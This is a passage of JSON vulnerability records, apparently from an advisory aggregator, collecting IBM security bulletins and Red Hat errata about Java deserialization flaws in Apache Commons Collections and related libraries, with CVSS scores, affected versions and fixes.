"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-7450"], "modified": "2018-06-17T22:32:15", "id": "865491A8AE45D8889B4A4B68C631AF51173BD6FAC1388EA03C0A94F22F2C9462", "href": "https://www.ibm.com/support/pages/node/272069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:52:38", "description": "## Summary\n\nIBM Security Verify Governance uses Apache Commons Collections library which is vulnerable to arbitrary code execution by an attacker by sending specially crafted serialized objects (CVE-2017-15708, CVE-2015-7501, CVE-2015-6420, CVE-2015-4852, CVE-2019-13116). The fix includes upgrading the Commons Collections jar to the patched version.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2017-15708](<https://vulners.com/cve/CVE-2017-15708>) \n** DESCRIPTION: **Apache Synapse could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Apache Commons Collections. By injecting specially-crafted serialized objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-7501](<https://vulners.com/cve/CVE-2015-7501>) \n** DESCRIPTION: **Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-6420](<https://vulners.com/cve/CVE-2015-6420>) \n** DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-4852](<https://vulners.com/cve/CVE-2015-4852>) \n** DESCRIPTION: **The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-13116](<https://vulners.com/cve/CVE-2019-13116>) \n** DESCRIPTION: **MuleSoft Mule runtime could allow a remote attacker to execute arbitrary code on the system, caused by Java deserialization, related to Apache Commons Collections. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/169704](<https://exchange.xforce.ibmcloud.com/vulnerabilities/169704>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Verify Governance| 10.0 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)\n\n| \n\nVersion(s)\n\n| \n\nFirst Fix \n \n---|---|--- \n \nIBM Security Verify Governance\n\n| \n\n10.0.1\n\n| \n\n[10.0.1.0-ISS-ISVG-IGVA-FP0002](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Verify+Governance&release=10.0.0.0&platform=Linux&function=fixId&fixids=10.0.1.0-ISS-ISVG-IGVA-FP0002&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n**IBM strongly recommends addressing the vulnerability now.**\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T16:37:00", "type": "ibm", "title": "Security Bulletin: IBM Security Verify Governance is vulnerable to arbitrary code execution due to use of Apache Commons Collections (multiple vulnerabilities)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-7501", "CVE-2017-15708", "CVE-2019-13116"], "modified": "2022-11-22T16:37:00", "id": "9A19B1A61B0A4ADFDBA9E428552BF21656703586B14AC314FFC9B663C7D9BDEB", "href": "https://www.ibm.com/support/pages/node/6841039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:54:55", "description": "## Summary\n\nMultiple vulnerabilities in Apache Commons Collections used by IBM InfoSphere Information Server were addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2015-4852](<https://vulners.com/cve/CVE-2015-4852>) \n** DESCRIPTION: **The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-6420](<https://vulners.com/cve/CVE-2015-6420>) \n** DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-15708](<https://vulners.com/cve/CVE-2017-15708>) \n** DESCRIPTION: **Apache Synapse could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Apache Commons Collections. By injecting specially-crafted serialized objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-7501](<https://vulners.com/cve/CVE-2015-7501>) \n** DESCRIPTION: **Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-13116](<https://vulners.com/cve/CVE-2019-13116>) \n** DESCRIPTION: **MuleSoft Mule runtime could allow a remote attacker to execute arbitrary code on the system, caused by Java deserialization, related to Apache Commons Collections. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/169704](<https://exchange.xforce.ibmcloud.com/vulnerabilities/169704>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nInfoSphere Information Server| 11.7 \n \n\n\n## Remediation/Fixes\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud| 11.7| [JR64991](<https://www.ibm.com/support/pages/apar/JR64991> \"JR64991\" ) \n| \\--Apply InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/docview.wss?uid=ibm10878310> \"11.7.1.0\" ) \n\\--Apply InfoSphere Information Server version [11.7.1.4](<https://www.ibm.com/support/pages/node/6620275> \"11.7.1.4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-14T22:00:35", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Commons Collections affect IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-7501", "CVE-2017-15708", "CVE-2019-13116"], "modified": "2022-10-14T22:00:35", "id": "DAB88099018B311F83DAFDB9431625A326A00FF72BE126856DCECA1262D7C308", "href": "https://www.ibm.com/support/pages/node/6829349", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T21:49:42", "description": "## Summary\n\nJazz for Service Management is affected with multiple vulnerabilities (CVE-2015-4852, CVE-2015-6420, CVE-2017-15708)\n\n## Vulnerability Details\n\n**CVEID: **CVE-2017-15708 \n**DESCRIPTION: **In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version\n\n**CVEID: **[](<https://vulners.com/cve/CVE-2019-17566>)CVE-2015-6420[](<https://vulners.com/cve/CVE-2019-17566>) \n**DESCRIPTION: ** Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Clien t Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Net work Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transco ding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrar y commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library\n\n**CVEID: **CVE-2015-4852 \n**DESCRIPTION: ** The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 all ows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collection s.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.\n\n## Affected Products and Versions\n\n## Affected JazzSM versions\n\nAffected Product(s) | Version(s) \n---|--- \nJazz for Service Management | 1.1.3 - 1.1.3.8 \n \n## Remediation/Fixes\n\n1\\. Upgrade IBM Websphere Application Server (WAS) version to v8.5.5.17 or v8.5.5.18\n\n2\\. Move commons-collections.jar file from below path to another safe location \n\n&lt;JazzSM Installed Location&gt;/profile/installedApps/JazzSMNode01Cell/isc.ear\n\n3\\. Copy commons-collections.jar file from folder &lt;WAS Installed Location&gt;/systemApps/isclite.ear to &lt;JazzSM Installed Location&gt;/profile/installedApps/JazzSMNode01Cell/isc.ear\n\n4\\. Restart JazzSM profile server\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-20T11:33:26", "type": "ibm", "title": "Security Bulletin: IBM Jazz for Service Management (JazzSM) is affected with multiple vulnerabilities (CVE-2015-4852, CVE-2015-6420, CVE-2017-15708)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2017-15708", "CVE-2019-17566"], "modified": "2020-10-20T11:33:26", "id": "44D4BE9C6B3A5CA2D7E393A0C6B1DE6752C9B6BDF8F6BC23CA690D4063D3152B", "href": "https://www.ibm.com/support/pages/node/6350069", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss Operations Network is a Middleware management solution that\nprovides a single point of control to deploy, manage, and monitor JBoss\nEnterprise Middleware, applications, and services.\n\nThis JBoss Operations Network 3.3.5 release serves as a replacement for\nJBoss Operations Network 3.3.4, and includes several bug fixes. Refer to\nthe Customer Portal page linked in the References section for information\non the most significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the commons-\ncollections library. (CVE-2015-7501)\n\nA flaw was discovered in the way applications using Groovy used the\nstandard Java serialization mechanism. A remote attacker could use a\nspecially crafted serialized object that would execute code directly\nwhen deserialized. All applications which rely on serialization and do\nnot isolate the code which deserializes objects are subject to this\nvulnerability. (CVE-2015-3253)\n\nAll users of JBoss Operations Network 3.3.4 as provided from the Red Hat\nCustomer Portal are advised to upgrade to JBoss Operations Network 3.3.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-03T14:54:58", "type": "redhat", "title": "(RHSA-2016:0118) Critical: Red Hat JBoss Operations Network 3.3.5 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-7501"], "modified": "2019-02-20T12:25:07", "id": "RHSA-2016:0118", "href": "https://access.redhat.com/errata/RHSA-2016:0118", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss A-MQ, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nRed Hat JBoss A-MQ 6.2.1 is a micro product release that updates Red Hat\nJBoss A-MQ 6.2.0, and includes several bug fixes and enhancements. Refer to\nthe Release Notes document, available from the link in the References\nsection, for a list of changes.\n\nThe following security fixes are addressed in this release:\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this issue may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nA flaw was discovered that when an application uses Groovy (has it on the\nclasspath) and uses the standard Java serialization mechanism, an attacker\ncan bake a special serialized object that executes code directly when\ndeserialized. All applications which rely on serialization and do not\nisolate the code which deserializes objects are subject to this\nvulnerability. (CVE-2015-3253)\n\nIt was found that the JBoss A-MQ console would accept a string containing\nJavaScript as the name of a new message queue. Execution of the UI would\nsubsequently execute the script. An attacker could use this flaw to access\nsensitive information or perform other attacks. (CVE-2015-5181)\n\nRed Hat would like to thank Naftali Rosenbaum of Comsec Consulting for\nreporting CVE-2015-5181.\n\nAll users of Red Hat JBoss A-MQ 6.2.0 as provided from the Red Hat Customer\nPortal are advised to apply this update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-07T20:42:21", "type": "redhat", "title": "(RHSA-2015:2557) Important: Red Hat JBoss A-MQ 6.2.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-5181", "CVE-2015-7501"], "modified": "2019-02-20T12:24:14", "id": "RHSA-2015:2557", "href": "https://access.redhat.com/errata/RHSA-2015:2557", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,\nflexible, open source enterprise service bus and integration platform.\n\nRed Hat JBoss Fuse 6.2.1 is a micro product release that updates Red Hat\nJBoss Fuse 6.2.0, and includes several bug fixes and enhancements. Refer to\nthe Release Notes document, available from the link in the References\nsection, for a list of changes.\n\nThe following security fixes are addressed in this release:\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this issue may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nA flaw was discovered that when an application uses Groovy (has it on the\nclasspath) and uses the standard Java serialization mechanism, an attacker\ncan bake a special serialized object that executes code directly when\ndeserialized. All applications which rely on serialization and do not\nisolate the code which deserializes objects are subject to this\nvulnerability. (CVE-2015-3253)\n\nIt was found that the JBoss A-MQ console would accept a string containing\nJavaScript as the name of a new message queue. Execution of the UI would\nsubsequently execute the script. An attacker could use this flaw to access\nsensitive information or perform other attacks. (CVE-2015-5181)\n\nRed Hat would like to thank Naftali Rosenbaum of Comsec Consulting for\nreporting CVE-2015-5181.\n\nAll users of Red Hat JBoss Fuse 6.2.0 are advised to apply this update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-07T20:42:09", "type": "redhat", "title": "(RHSA-2015:2556) Important: Red Hat JBoss Fuse 6.2.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-5181", "CVE-2015-7501"], "modified": "2019-02-20T12:24:40", "id": "RHSA-2015:2556", "href": "https://access.redhat.com/errata/RHSA-2015:2556", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:38:05", "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint, flexible, open source enterprise service bus and integration platform.\n\nRed Hat JBoss Fuse 6.3 is a minor product release that updates Red Hat JBoss Fuse 6.2.1, and includes several bug fixes and enhancements. Refer to the Release Notes document, available from the Product Documentation link in the References section, for a list of these changes.\n\nSecurity Fix(es):\n\nIt was found that JGroups did not require necessary headers for encrypt and auth protocols from new nodes joining the cluster. An attacker could use this flaw to bypass security restrictions, and use this vulnerability to send and receive messages within the cluster, leading to information disclosure, message spoofing, or further possible attacks. (CVE-2016-2141)\n\nA deserialization flaw allowing remote code execution was found in the BeanShell library. If BeanShell was on the classpath, it could permit code execution if another part of the application deserialized objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the BeanShell library. (CVE-2016-2510)\n\nIt was found that Apache Shiro uses a default cipher key for its \"remember me\" feature. An attacker could use this to devise a malicious request parameter and gain access to unauthorized content. (CVE-2016-4437)\n\nA denial of service flaw was found in the way Spring processes inline DTD declarations. A remote attacker could submit a specially crafted XML file that would cause out-of-memory errors when parsed. (CVE-2015-3192)\n\nIt was found that Apache Camel's camel-xstream component was vulnerable to Java object deserialization. This vulnerability permits deserialization of data which could lead to information disclosure, code execution, or other possible attacks. (CVE-2015-5344)\n\nIt was found that Apache Camel's Jetty/Servlet permitted object deserialization. If using camel-jetty or camel-servlet as a consumer in Camel routes, then Camel will automatically deserialize HTTP requests that use the content-header: application/x-java-serialized-object. An attacker could use this vulnerability to gain access to unauthorized information or conduct further attacks. (CVE-2015-5348)\n\nIt was found that bouncycastle is vulnerable to an invalid curve attack. An attacker could extract private keys used in elliptic curve cryptography with a few thousand queries. (CVE-2015-7940)\n\nThe CVE-2016-2141 issue was discovered by Dennis Reed (Red Hat).\n\nRefer to the Product Documentation link in the References section for installation instructions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-06T16:16:07", "type": "redhat", "title": "(RHSA-2016:2035) Important: Red Hat JBoss Fuse 6.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3192", "CVE-2015-5254", "CVE-2015-5344", "CVE-2015-5348", "CVE-2015-7940", "CVE-2016-2141", "CVE-2016-2510", "CVE-2016-4437"], "modified": "2019-02-20T12:29:07", "id": "RHSA-2016:2035", "href": "https://access.redhat.com/errata/RHSA-2016:2035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T16:21:59", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.1.0 serves as an update to Red Hat Process Automation Manager 7.0.2, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* Resteasy: Yaml unmarshalling vulnerable to RCE (CVE-2016-9606)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting CVE-2016-9606.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-11T12:36:27", "type": "redhat", "title": "(RHSA-2018:2909) Moderate: Red Hat Process Automation Manager 7.1.0 bug fix and security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-10-11T12:36:42", "id": "RHSA-2018:2909", "href": "https://access.redhat.com/errata/RHSA-2018:2909", "cvss": {"score": 6.8, "vector": 